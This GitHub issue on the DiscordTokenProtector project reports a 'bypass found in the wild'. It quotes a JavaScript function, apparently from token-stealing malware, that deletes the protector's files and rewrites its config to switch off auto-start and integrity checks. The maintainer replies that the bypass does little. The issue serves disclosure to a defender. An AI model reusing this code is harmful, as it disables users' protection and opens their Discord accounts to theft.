Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bypass found in the wild #60

Open
CanadaHonk opened this issue Oct 2, 2022 · 1 comment
Open

Bypass found in the wild #60

CanadaHonk opened this issue Oct 2, 2022 · 1 comment

Comments

@CanadaHonk
Copy link 

bypass_token_protector() {
            for (const file of ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]) {
                if (client.requires.fs.exists(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`)) {
                    client.requires.fs.rm(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`);
                }
            }
            const token_protector_config = JSON.parse(client.requires.fs.readFileSync(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`, {
                encoding: "utf-8"
            }))
            token_protector_config['auto_start'] = false
            token_protector_config['auto_start_discord'] = false
            token_protector_config['integrity'] = false
            token_protector_config['integrity_allowbetterdiscord'] = false
            token_protector_config['integrity_checkexecutable'] = false
            token_protector_config['integrity_checkhash'] = false
            token_protector_config['integrity_checkmodule'] = false
            token_protector_config['integrity_checkscripts'] = false
            token_protector_config['integrity_checkresource'] = false
            token_protector_config['integrity_redownloadhashes'] = false
            token_protector_config['iterations_iv'] = 0
            token_protector_config['iterations_key'] = 0
            token_protector_config['version'] = 0
            client.requires.fs.writeFileSync(
                `${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`,
                JSON.stringify(
                    token_protector_config,
                    null, 4
                )
            )
        }

GLHF
@andro2157
Copy link
Owner

I've seen similar "bypasses" in the wild. In overall (including this one), they only work if :

  • DTP is not running, and in this case, they can only get the token through social engineering (making you relogin without DTP). The config changes are useless as these critical configs have been moved to the encrypted container.
  • If they run using admin privilege. If you allow a program to run using admin privilege you can safely assume that your token can be easily compromised. DTP cannot block attacks with admin privilege since it is in user land.

In this case, the config change, even if successful, won't do anything.

TLDR : useless bypass that won't do much.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@CanadaHonk @andro2157